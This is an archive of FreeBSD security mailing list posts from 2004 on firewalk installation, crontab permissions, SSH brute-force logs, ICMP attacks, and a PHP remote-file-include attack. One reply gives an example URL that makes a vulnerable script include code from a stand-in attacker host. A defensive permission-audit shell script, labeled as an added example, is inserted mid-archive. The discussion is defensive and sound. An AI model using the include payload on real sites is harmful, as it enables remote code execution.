From: c0ldbyte To: freebsd-security@freebsd.org In-Reply-To: <20040810120129.6D66716A4CE@hub.freebsd.org> Message-ID: References: <20040810120129.6D66716A4CE@hub.freebsd.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: Re: freebsd-security Digest, Vol 72, Issue 2 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 20:34:04 -0000 ----------------------------------------------------------------- Doesn't all this belong somewhere else besides the security lists, since this isn't a security issue? ----------------------------------------------------------------- On Tue, 10 Aug 2004 freebsd-security-request@freebsd.org wrote: > Send freebsd-security mailing list submissions to > freebsd-security@freebsd.org > > To subscribe or unsubscribe via the World Wide Web, visit > http://lists.freebsd.org/mailman/listinfo/freebsd-security > or, via email, send a message with subject or body 'help' to > freebsd-security-request@freebsd.org > > You can reach the person managing the list at > freebsd-security-owner@freebsd.org > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of freebsd-security digest..." > > > Today's Topics: > > 1. firewalk (Kenzo) > 2. Re: firewalk (Fabio Miranda Hamburger) > 3. Re: firewalk (Kenzo) > 4. Re: firewalk (Kevin D. Kinsey, DaleCo, S.P.) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Mon, 9 Aug 2004 14:04:25 -0500
> From: "Kenzo" > Subject: firewalk > To: > Message-ID: > Content-Type: text/plain; charset="iso-8859-1" > > I was wondering if anyone got firewalk to install? > I'm running 4.10 stable and it doesn't seem to want to install. > It's looking for libnet 1.1 or higher I believe and the ports only comes > with version 1.0. > I manually downloaded the latest version and installed it. Still firewalk > doesn't know where to look for it. > any ideas?? > > Thanks. > > ------------------------------ > > Message: 2 > Date: Mon, 9 Aug 2004 12:33:38 -0600 (CST) > From: Fabio Miranda Hamburger > Subject: Re: firewalk > To: Kenzo > Cc: freebsd-security@freebsd.org > Message-ID: > Content-Type: TEXT/PLAIN; charset=US-ASCII > >> I was wondering if anyone got firewalk to install? >> I'm running 4.10 stable and it doesn't seem to want to install. >> It's looking for libnet 1.1 or higher I believe and the ports only comes >> with version 1.0. >> I manually downloaded the latest version and installed it. Still firewalk >> doesn't know where to look for it. > > > #cd /usr/ports/security/firewalk > #make install clean > > works fine. > > If no, try to cvsup latest -stable port collection. > > > ------------------------------ > > Message: 3 > Date: Mon, 9 Aug 2004 15:26:52 -0500 
> From: "Kenzo" > Subject: Re: firewalk > Cc: > Message-ID: > Content-Type: text/plain; charset="iso-8859-1" > > This is what I get. > > alien# sudo make install clean > ===> Building for firewalk-5.0_1 > Making all in src > cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -ma > rch= > pentiumpro -Wall -c init.c > In file included from /usr/local/include/libnet.h:62, > from ../include/firewalk.h:42, > from init.c:38: > /usr/include/netinet/ip_icmp.h:81: warning: `icmp_pptr' redefined > /usr/local/include/dnet/icmp.h:131: warning: this is the location of the > previou > s definition > /usr/include/netinet/ip_icmp.h:82: warning: `icmp_gwaddr' redefined > /usr/local/include/dnet/icmp.h:144: warning: this is the location of the > previou > s definition > /usr/include/netinet/ip_icmp.h:185: warning: `ICMP_INFOTYPE' redefined > /usr/local/include/dnet/icmp.h:104: warning: this is the location of the > previou > s definition > In file included from ../include/firewalk.h:42, > from init.c:38: > /usr/local/include/libnet.h:87: #error "byte order has not been specified, > you'l > l" > In file included from ../include/firewalk.h:42, > from init.c:38: > /usr/local/include/libnet.h:88: syntax error before string constant > *** Error code 1 > > Stop in /usr/ports/security/firewalk/work/Firewalk/src. > *** Error code 1 > > Stop in /usr/ports/security/firewalk/work/Firewalk. > *** Error code 1 > > Stop in /usr/ports/security/firewalk. > > I have no idea what this is. > > ----- Original Message ----- 
> From: "Fabio Miranda Hamburger" > To: "Kenzo" > Cc: > Sent: Monday, August 09, 2004 1:33 PM > Subject: Re: firewalk > > >>> I was wondering if anyone got firewalk to install? >>> I'm running 4.10 stable and it doesn't seem to want to install. >>> It's looking for libnet 1.1 or higher I believe and the ports only comes >>> with version 1.0. >>> I manually downloaded the latest version and installed it. Still > firewalk >>> doesn't know where to look for it. >> >> >> #cd /usr/ports/security/firewalk >> #make install clean >> >> works fine. >> >> If no, try to cvsup latest -stable port collection. >> >> > > ------------------------------ > > Message: 4 > Date: Mon, 09 Aug 2004 15:53:34 -0500 
> From: "Kevin D. Kinsey, DaleCo, S.P." > Subject: Re: firewalk > To: Kenzo > Cc: freebsd-security@freebsd.org > Message-ID: <4117E44E.1010605@daleco.biz> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Kenzo wrote: > >> This is what I get. >> >> alien# sudo make install clean >> ===> Building for firewalk-5.0_1 >> Making all in src >> cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -ma >> rch= >> pentiumpro -Wall -c init.c >> In file included from /usr/local/include/libnet.h:62, >> from ../include/firewalk.h:42, >> from init.c:38: >> /usr/include/netinet/ip_icmp.h:81: warning: `icmp_pptr' redefined >> /usr/local/include/dnet/icmp.h:131: warning: this is the location of the >> previou >> s definition >> /usr/include/netinet/ip_icmp.h:82: warning: `icmp_gwaddr' redefined >> /usr/local/include/dnet/icmp.h:144: warning: this is the location of the >> previou >> s definition >> /usr/include/netinet/ip_icmp.h:185: warning: `ICMP_INFOTYPE' redefined >> /usr/local/include/dnet/icmp.h:104: warning: this is the location of the >> previou >> s definition >> In file included from ../include/firewalk.h:42, >> from init.c:38: >> /usr/local/include/libnet.h:87: #error "byte order has not been specified, >> you'l >> l" >> In file included from ../include/firewalk.h:42, >> from init.c:38: >> /usr/local/include/libnet.h:88: syntax error before string constant >> *** Error code 1 >> >> Stop in /usr/ports/security/firewalk/work/Firewalk/src. >> *** Error code 1 >> >> Stop in /usr/ports/security/firewalk/work/Firewalk. >> *** Error code 1 >> >> Stop in /usr/ports/security/firewalk. >> >> I have no idea what this is. >> >> > > Looks like someone made a mistake in the libnet > port. You can check and see if they've fixed at > either via their website or by checking if a newer > version with a different checksum exists at > the ftp site. If your ports tree is out of date, it > would probably be best to cvsup it anyway... 
> > You might also be able to fix the error yourself --- > check line 87 - 88 of /usr/local/include/libnet.h. > > Quite possibly a commented line wrapped wrongly > in this case. > > HTH, > > Kevin Kinsey > > ------------------------------ > > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" > > End of freebsd-security Digest, Vol 72, Issue 2 > *********************************************** > From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 20:56:28 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A71BF16A4CE for ; Wed, 11 Aug 2004 20:56:28 +0000 (GMT) Received: from drizzle.sasknow.net (drizzle.sasknow.net [204.83.220.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4CD7B43D2D for ; Wed, 11 Aug 2004 20:56:28 +0000 (GMT) (envelope-from ryan@sasknow.com) Received: from mail.sasknow.com (mail.sasknow.com [207.195.92.135]) by drizzle.sasknow.net (8.12.9p2/8.12.9) with ESMTP id i7BKuP2v017798 for ; Wed, 11 Aug 2004 14:56:25 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Wed, 11 Aug 2004 14:56:25 -0600 (CST) 
From: Ryan Thompson To: freebsd-security@freebsd.org In-Reply-To: <20040811111334.G44734@drizzle.sasknow.net> Message-ID: <20040811145610.K41454@drizzle.sasknow.net> References: <20040810161305.GA161@frontfree.net> <20040811111334.G44734@drizzle.sasknow.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Virus-Status: Clean, ClamAV version devel-20040729, clamav-milter version 0.75b on drizzle.sasknow.net X-Spam-Status: No, hits=-19.538 required=7 tests=MSGID_PINE=-2.1,RT_SUBJ_RE7=-0.3,ALL_TRUSTED=-0.8,BAYES_00=-4.9,BAYES_LOW_AND_TZ_NEAR=-7.0,TIME_13_17_BAYES_LOW=-7.0,AWL=2.6 autolearn=no version=3.000000-pre3 Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 11 Aug 2004 20:56:28 -0000 Hi Xin, Personally, I'd be opposed to this idea, for a couple of reasons: 1. The impact is too narrow. There are many, many files in /etc/ (and elsewhere, for that matter) that are also currently set world-readable by default. Patching the perms of just one file creates inconsistency, and, without a more general policy on this sort of thing, we're likely to hear whining about "everything *else* is world-readable. What's so special about /etc/crontab?" 2. Even if there *is* some small security benefit to be gained through obscurity (see #3), it's probably outweighed by the convenience of the matter in this case, and that has some real security implications. We'd be asking admins to su every time they want to look at /etc/crontab. For most of us, we consider our systems more secure the more we can do without a superuser shell. 3. You're not really gaining much by making /etc/crontab only readable by the superuser.
It's currently trivial for regular users to view process information, and most cron jobs run on predictable boundaries (since per-minute timings are the most granular scheduling allowed). We don't want admins thinking, "nobody else can read this file, so anything I put in here must be top secret", because that's *not* the case. Just my CA$0.10. :-) - Ryan Xin LI wrote to freebsd-security@freebsd.org: > Hi folks, > > While investigating OpenBSD's cron implementation, I found that they set > the systemwide crontab (a.k.a. /etc/crontab) to be readable by the > superuser only. The attached patch will bring this to FreeBSD by moving > crontab out from BIN1 group and install it along with master.passwd. > > This change should not affect the current cron(1) behavior. > > Cheers, > -- > Xin LI http://www.delphij.net/ > See complete headers for GPG key and other information. > > -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901-1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 21:07:15 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 67BED16A4CE for ; Wed, 11 Aug 2004 21:07:15 +0000 (GMT) Received: from drizzle.sasknow.net (drizzle.sasknow.net [204.83.220.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id C164A43D46 for ; Wed, 11 Aug 2004 21:07:14 +0000 (GMT) (envelope-from ryan@sasknow.com) Received: from mail.sasknow.com (mail.sasknow.com [207.195.92.135]) by drizzle.sasknow.net (8.12.9p2/8.12.9) with ESMTP id i7BL7B2v018509 for ; Wed, 11 Aug 2004 15:07:11 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Wed, 11 Aug 2004 15:07:11 -0600 (CST) 
From: Ryan Thompson To: freebsd-security@freebsd.org Message-ID: <20040811145637.R41454@drizzle.sasknow.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Spam-Virus-Status: Clean, ClamAV version devel-20040729, clamav-milter version 0.75b on drizzle.sasknow.net X-Spam-Status: No, hits=-19.409 required=7 tests=MSGID_PINE=-2.1,ALL_TRUSTED=-0.8,BAYES_00=-4.9,BAYES_LOW_AND_TZ_NEAR=-7.0,TIME_13_17_BAYES_LOW=-7.0,AWL=2.4 autolearn=no version=3.000000-pre3 Subject: FreeBSD-SA-04:13.linux in the wild X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 11 Aug 2004 21:07:15 -0000 Has anyone else seen this in the wild? We just had an attempted attack yesterday from a live attacker on one of our machines using this vulnerability. It wasn't all that clever, and they're long gone, but I *did* manage to catch them in the act and grab a copy of the binary they tried to run from /tmp/, as well as the PHP injection code they used to subvert a virtual web site's poorly-written index.php script to execute commands as a local user. Their first order of business was uname -a, and the timing of the requests appeared to be random and experimental ("cd /tmp; ls -la", a few times). If any @FreeBSD.org developers would like more information, I'd be happy to share my findings and log output off-list. 
- Ryan

--
Ryan Thompson

SaskNow Technologies - http://www.sasknow.com
901-1st Avenue North - Saskatoon, SK - S7K 1Y4

Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon
Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 21:24:10 2004
Message-ID: <015701c47fe9$83dc7ff0$9c01a8c0@chivas>
From: "Gustavo A. Baratto"
To: "Ryan Thompson", freebsd-security@freebsd.org
References: <20040811145637.R41454@drizzle.sasknow.net>
Date: Wed, 11 Aug 2004 14:23:58 -0700
Subject: Re: FreeBSD-SA-04:13.linux in the wild

I think I may have seen such a thing before as well... not a freebsd
problem though... It's php's own fault.

php comes with url_fopen enabled by default, so if someone writes a
script.php with something like:

include ("$var");

one could call

http://goodguys.com/script.php?var=http://badguys.com/malicious_script.txt

and the text of malicious_script.php hosted remotely would be included in
script.php, and any arbitrary code would be executed with www privileges.

Just disabling url_fopen in php.ini would prevent that.

If this is not what you have seen, please, I'd like to know more about it.

Thank you ;)

----- Original Message -----
From: "Ryan Thompson"
Sent: Wednesday, August 11, 2004 2:07 PM
Subject: FreeBSD-SA-04:13.linux in the wild

> Has anyone else seen this in the wild?
>
> We just had an attempted attack yesterday from a live attacker on one of
> our machines using this vulnerability. It wasn't all that clever, and
> they're long gone, but I *did* manage to catch them in the act and grab
> a copy of the binary they tried to run from /tmp/, as well as the PHP
> injection code they used to subvert a virtual web site's poorly-written
> index.php script to execute commands as a local user.
>
> Their first order of business was uname -a, and the timing of the
> requests appeared to be random and experimental ("cd /tmp; ls -la", a
> few times). If any @FreeBSD.org developers would like more information,
> I'd be happy to share my findings and log output off-list.
>
> - Ryan
>
> --
> Ryan Thompson
>
> SaskNow Technologies - http://www.sasknow.com
> 901-1st Avenue North - Saskatoon, SK - S7K 1Y4
>
> Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon
> Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 21:32:13 2004
Date: Wed, 11 Aug 2004 15:32:12 -0600 (CST)
From: Ryan Thompson
To: "Gustavo A. Baratto"
cc: freebsd-security@freebsd.org
In-Reply-To: <015701c47fe9$83dc7ff0$9c01a8c0@chivas>
Message-ID: <20040811152741.R41454@drizzle.sasknow.net>
References: <20040811145637.R41454@drizzle.sasknow.net> <015701c47fe9$83dc7ff0$9c01a8c0@chivas>
Subject: Re: FreeBSD-SA-04:13.linux in the wild

Gustavo A. Baratto wrote to Ryan Thompson and freebsd-security@freebsd.org:

> I think I may have seen such a thing before as well... not a freebsd problem
> though... It's php's own fault.
> php comes with url_fopen enabled by default, so if someone writes a
> script.php with something like:
> include ("$var");
>
> [...]
>
> just disabling url_fopen in php.ini would prevent that.
>
> If this is not what you have seen, please, I'd like to know more about it.

Yep, that's almost exactly what happened. The PHP injection by itself is
fairly pedestrian, and happens on a fairly regular basis (so we have
audits for a whole host of things like this). I just mentioned it to give
a bit of background to the attack. The linux exploit, though, I hadn't
spotted in the wild yet, thus my post, here.
- Ryan

--
Ryan Thompson

SaskNow Technologies - http://www.sasknow.com
901-1st Avenue North - Saskatoon, SK - S7K 1Y4

Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon
Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security@FreeBSD.ORG Thu Aug 12 04:06:06 2004
Date: Thu, 12 Aug 2004 12:05:56 +0800
From: Xin LI
To: Thomas Quinot
cc: freebsd-security@FreeBSD.org, Doug Barton
Message-ID: <20040812040556.GC305@frontfree.net>
In-Reply-To: <20040811132930.GA3936@melusine.cuivre.fr.eu.org>
References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040811132930.GA3936@melusine.cuivre.fr.eu.org>
Subject: Re: [PATCH] Tighten /etc/crontab permissions

On Wed, Aug 11, 2004 at 03:29:30PM +0200, Thomas Quinot wrote:
> * Doug Barton, 2004-08-10 :
>
> > Do you have a reason for wanting to do this other than, "OpenBSD does it
> > this way?" I personally see no problems, and some benefit for users
> > being able to see the system crontab. If the superuser needs to run
> > "secret" cron jobs, then there is root's crontab that can be used for
> > this purpose.
>
> Seconded. I would find it a nuisance to have to chmod a+r /etc/crontab
> on all systems I set up.
> People who need tightened security against
> hostile local users can use tools such as security/lockdown that will,
> among many other things, remove world-read permissions from a bunch of
> systemwide configuration files, including /etc/crontab.

I think I would want to compromise at this point ;) In addition to this,
personally I suggest the following changes to be made:

- Provide an option in sysinstall so users will be instructed to choose
  whether to ``lockdown'' their systems as soon as the configuration is
  completed. Also, include this utility in the installation disc.
- Add a new security audit script which will tell admins that the
  permission of "watched" configurations was altered. This might be
  turned off by default, or even a dependency port of lockdown, to
  provide a mechanism to detect potential break-ins earlier, and to
  notify users when something like mergemaster or manual etc/ upgrades
  has reverted the permissions.

What do you think about this? Actually the FreeBSD Simplified Chinese
project is recently coordinating an effort of making an Internationalized
FreeBSD Installer; I think we will try to implement these things if they
look better.

Cheers,
--
Xin LI http://www.delphij.net/
See complete headers for GPG key and other information.
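The "watched permissions" audit script Xin LI proposes above, sketched as an added example (not code from the thread, nor from FreeBSD's periodic(8) scripts): it reads a list of configuration files with their expected modes and reports any that differ or are missing, so a cron or periodic job can mail the admin when mergemaster or a manual /etc upgrade has reverted a tightened permission. The function names, the watch-list format and the default list (master.passwd, spwd.db and a superuser-only /etc/crontab, mode 600 each, following the policy the patch proposes) are my assumptions for illustration.

```shell
#!/bin/sh
# Added example: a small "watched permissions" audit in the spirit of the
# script Xin LI proposes in this thread. Not FreeBSD's periodic(8) code.
#
# Watch list format, one entry per line: <path> <expected octal mode>
# The default list assumes the tightened policy discussed in the thread
# (/etc/crontab readable by the superuser only, like master.passwd).
DEFAULT_WATCHLIST='/etc/master.passwd 600
/etc/spwd.db 600
/etc/crontab 600'

# Print the low permission bits of a file as octal digits (e.g. 644).
# Tries GNU stat(1) first (Linux), then BSD stat(1) (FreeBSD).
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%OLp' "$1"
}

# audit_perms < watchlist
# Reports every watched file whose mode differs from the expected one, or
# which is missing. The exit status is the number of findings (0 means
# everything matched), so periodic(8) or cron can mail the output only
# when something changed.
audit_perms() {
    findings=0
    while read -r path expected; do
        # skip blank lines and comments in the watch list
        case "$path" in ''|'#'*) continue ;; esac
        if [ ! -e "$path" ]; then
            echo "$path: missing (expected mode $expected)"
            findings=$((findings + 1))
            continue
        fi
        actual=$(file_mode "$path")
        if [ "$actual" != "$expected" ]; then
            echo "$path: mode $actual, expected $expected"
            findings=$((findings + 1))
        fi
    done
    return "$findings"
}

# Stand-alone: `sh audit_perms.sh --defaults` checks the list above;
# otherwise feed your own watch list on stdin: audit_perms < watchlist
if [ "${1:-}" = "--defaults" ]; then
    printf '%s\n' "$DEFAULT_WATCHLIST" | audit_perms
fi
```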
From owner-freebsd-security@FreeBSD.ORG Thu Aug 12 04:57:03 2004
Date: Wed, 11 Aug 2004 21:57:01 -0700 (PDT)
From: Doug Barton
To: Xin LI
cc: freebsd-security@FreeBSD.org, Thomas Quinot
In-Reply-To: <20040812040556.GC305@frontfree.net>
Message-ID: <20040811215606.H817@ync.qbhto.arg>
References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040812040556.GC305@frontfree.net>
Organization: http://www.FreeBSD.org/
Subject: Re: [PATCH] Tighten /etc/crontab permissions

On Thu, 12 Aug 2004, Xin LI wrote:

> I think I would want to compromise at this point ;) In addition to this,
> personally I suggest the following changes to be made:
>
> - Provide an option in sysinstall so users will be instructed
>   to choose whether to ``lockdown'' their systems as soon as
>   the configuration is completed. Also, include this utility
>   in the installation disc.
> - Add a new security audit script which will tell admins that
>   the permission of "watched" configurations was altered.
>   This might be turned off by default, or even a dependency port
>   of lockdown, to provide a mechanism to detect potential
>   break-ins earlier, and to notify users when something like
>   mergemaster or manual etc/ upgrades has reverted the
>   permissions.
>
> What do you think about this? Actually the FreeBSD Simplified Chinese
> project is recently coordinating an effort of making an Internationalized
> FreeBSD Installer, I think we will try to implement these
> things if they look better.

Those sound like good goals, I wish you great luck with them.
:)

Doug

--
This .signature sanitized for your protection

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:05:43 2004
Message-ID: <411CCAAE.7020505@beco.hu>
Date: Fri, 13 Aug 2004 16:05:34 +0200
From: Sandor Berta
To: freebsd-security@freebsd.org
Subject: sequences in the auth.log

Hi all,

I found similar sequences in the /var/auth.log files of FreeBSD boxes I
supervise:

Aug 13 13:56:08 www sshd[26091]: Illegal user test from 165.21.103.20
Aug 13 13:56:11 www sshd[26093]: Illegal user guest from 165.21.103.20
Aug 13 13:56:15 www sshd[26096]: Illegal user admin from 165.21.103.20
Aug 13 13:56:18 www sshd[26103]: Illegal user admin from 165.21.103.20
Aug 13 13:56:21 www sshd[26105]: Illegal user user from 165.21.103.20
Aug 13 13:56:25 www sshd[26107]: Failed password for root from 165.21.103.20 port 39678 ssh2
Aug 13 13:56:28 www sshd[26109]: Failed password for root from 165.21.103.20 port 39760 ssh2
Aug 13 13:56:32 www sshd[26111]: Failed password for root from 165.21.103.20 port 39836 ssh2
Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20
Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57
Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57

What are these?
bye
Sandor Berta

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:11:19 2004
Date: Fri, 13 Aug 2004 10:11:18 -0400 (EDT)
From: Dan Langille
To: Sandor Berta
cc: freebsd-security@freebsd.org
In-Reply-To: <411CCAAE.7020505@beco.hu>
Message-ID: <20040813101046.J48580@xeon.unixathome.org>
References: <411CCAAE.7020505@beco.hu>
Subject: Re: sequences in the auth.log

On Fri, 13 Aug 2004, Sandor Berta wrote:

> Hi all,
> I found similar sequences in the
> /var/auth.log files of FreeBSD boxes I supervise:
> Aug 13 13:56:08 www sshd[26091]: Illegal user test from 165.21.103.20
> Aug 13 13:56:11 www sshd[26093]: Illegal user guest from 165.21.103.20
> Aug 13 13:56:15 www sshd[26096]: Illegal user admin from 165.21.103.20
> Aug 13 13:56:18 www sshd[26103]: Illegal user admin from 165.21.103.20
> Aug 13 13:56:21 www sshd[26105]: Illegal user user from 165.21.103.20
> Aug 13 13:56:25 www sshd[26107]: Failed password for root from
> 165.21.103.20 port 39678 ssh2
> Aug 13 13:56:28 www sshd[26109]: Failed password for root from
> 165.21.103.20 port 39760 ssh2
> Aug 13 13:56:32 www sshd[26111]: Failed password for root from
> 165.21.103.20 port 39836 ssh2
> Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20
> Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57
> Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57

There are failed attempts to log in via ssh.
--
Dan Langille - http://www.langille.org/

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:12:13 2004
Date: Fri, 13 Aug 2004 18:12:11 +0400
From: "Nikolaj I. Potanin"
To: freebsd-security@freebsd.org
In-Reply-To: <411CCAAE.7020505@beco.hu>
References: <411CCAAE.7020505@beco.hu>
Message-Id: <20040813181022.F864.NIKOLAJ@drweb.ru>
Subject: Re: sequences in the auth.log

Hello,

Someone is trying to pick up a password for these accounts. Restrict your
ssh service to your trusted networks only.
> Hi all,
> I found similar sequences in the
> /var/auth.log files of FreeBSD boxes I supervise:
> Aug 13 13:56:08 www sshd[26091]: Illegal user test from 165.21.103.20
> Aug 13 13:56:11 www sshd[26093]: Illegal user guest from 165.21.103.20
> Aug 13 13:56:15 www sshd[26096]: Illegal user admin from 165.21.103.20
> Aug 13 13:56:18 www sshd[26103]: Illegal user admin from 165.21.103.20
> Aug 13 13:56:21 www sshd[26105]: Illegal user user from 165.21.103.20
> Aug 13 13:56:25 www sshd[26107]: Failed password for root from
> 165.21.103.20 port 39678 ssh2
> Aug 13 13:56:28 www sshd[26109]: Failed password for root from
> 165.21.103.20 port 39760 ssh2
> Aug 13 13:56:32 www sshd[26111]: Failed password for root from
> 165.21.103.20 port 39836 ssh2
> Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20
> Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57
> Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57
>
> What are these?

--
Nikolaj I. Potanin, SA          http://www.drweb.ru
ID Anti-Virus Lab (SalD Ltd)    nikolaj@drweb.ru
St. Petersburg, Russia          ph.: +7-812-3888624

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:14:39 2004
Date: Fri, 13 Aug 2004 16:14:29 +0200 (CEST)
From: Mohacsi Janos
To: Sandor Berta
cc: freebsd-security@freebsd.org
In-Reply-To: <411CCAAE.7020505@beco.hu>
Message-ID: <20040813160928.M82373@mignon.ki.iif.hu>
References: <411CCAAE.7020505@beco.hu>
Subject: Re: sequences in the auth.log

Hi Sandor,

You don't have to worry, unless you have users 'test', 'guest', 'admin'
or 'root' with poor passwords: typically the same as or very similar to
your account name. There seems to be a script going around among hackers
to scan SSH and gain access to poorly configured servers.... Unfortunately
there are plenty of badly configured servers. Maybe you should disable
root access via SSH password (only via keys).
Regards,

Janos Mohacsi
Network Engineer, Research Associate
NIIF/HUNGARNET, HUNGARY
Key 00F9AF98: 8645 1312 D249 471B DBAE 21A2 9F52 0D1F 00F9 AF98

On Fri, 13 Aug 2004, Sandor Berta wrote:

> Hi all,
> I found similar sequences in the
> /var/auth.log files of FreeBSD boxes I supervise:
> Aug 13 13:56:08 www sshd[26091]: Illegal user test from 165.21.103.20
> Aug 13 13:56:11 www sshd[26093]: Illegal user guest from 165.21.103.20
> Aug 13 13:56:15 www sshd[26096]: Illegal user admin from 165.21.103.20
> Aug 13 13:56:18 www sshd[26103]: Illegal user admin from 165.21.103.20
> Aug 13 13:56:21 www sshd[26105]: Illegal user user from 165.21.103.20
> Aug 13 13:56:25 www sshd[26107]: Failed password for root from 165.21.103.20
> port 39678 ssh2
> Aug 13 13:56:28 www sshd[26109]: Failed password for root from 165.21.103.20
> port 39760 ssh2
> Aug 13 13:56:32 www sshd[26111]: Failed password for root from 165.21.103.20
> port 39836 ssh2
> Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20
> Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57
> Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57
>
> What are these?
>
> bye
> Sandor Berta

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 14:55:56 2004
Date: Fri, 13 Aug 2004 16:57:07 +0200
From: Jan Muenther
To: Sandor Berta
cc: freebsd-security@freebsd.org
Message-ID: <20040813145707.GB2097@localghost.muenther.de>
In-Reply-To: <411CCAAE.7020505@beco.hu>
References: <411CCAAE.7020505@beco.hu>
Subject: Re: sequences in the auth.log

Heya,

this is probably the same piece of malware that has been discussed on f-d
recently. The username/password combinations guest and test are hardcoded
into a little statically linked binary which is commonly used together
with a SYN scanner. Chances are good these attempts are coming from a
compromised box - you may want to look into that if it is in your realms.

If you need more info, I disassembled them both and made a quick analysis;
check the f-d archives.

Cheers, J.

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 15:55:39 2004
Message-ID: <411CE478.3050607@borderware.com>
Date: Fri, 13 Aug 2004 11:55:36 -0400
From: Steve Zweep
To: freebsd-security@freebsd.org
Subject: ICMP attacks against TCP

Has anyone seen the recently published IETF draft regarding ICMP attacks
against TCP?
[http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-00.txt]

I'm interested in any comments as to the vulnerability of FreeBSD's TCP to
such attacks and the need for or usefulness of the various solutions
proposed in the paper.

Thanks, all

- Steve

--
Steve Zweep
Senior Software Engineer
BorderWare Technologies Inc.
http://www.borderware.com

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 17:33:08 2004
Date: Fri, 13 Aug 2004 18:35:06 +0100
From: "Craig Edwards"
To: "Sandor Berta", freebsd-security@freebsd.org
Organization: Crypt Software
Reply-To: brain@winbot.co.uk
Subject: Re: sequences in the auth.log

I've been getting this too on both my FreeBSD boxes; it seems to be an
epidemic. I guess it's some form of ssh scanner looking for open accounts
with no passwords (or easily guessable passwords)?

Thanks,
Craig

>Hi all,
>I found similar sequences in the
>165.21.103.20 port 39836 ssh2
>Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20
>Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57
>Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57
>
>What are these?
>

From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 17:36:49 2004
Date: Fri, 13 Aug 2004 12:36:48 -0500 (CDT)
From: Mike Silbersack
To: Steve Zweep
cc: freebsd-security@freebsd.org
In-Reply-To: <411CE478.3050607@borderware.com>
Message-ID: <20040813123400.G1539@odysseus.silby.com>
References: <411CE478.3050607@borderware.com>
Subject: Re: ICMP attacks against TCP

On Fri, 13 Aug 2004, Steve Zweep wrote:

> Has anyone seen the recently published IETF draft regarding ICMP attacks
> against TCP?
> [http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-00.txt]
>
> I'm interested in any comments as to the vulnerability of FreeBSD's TCP to
> such attacks and the need for or usefulness of the various solutions proposed
> in the paper.
>
> Thanks, all
>
> - Steve

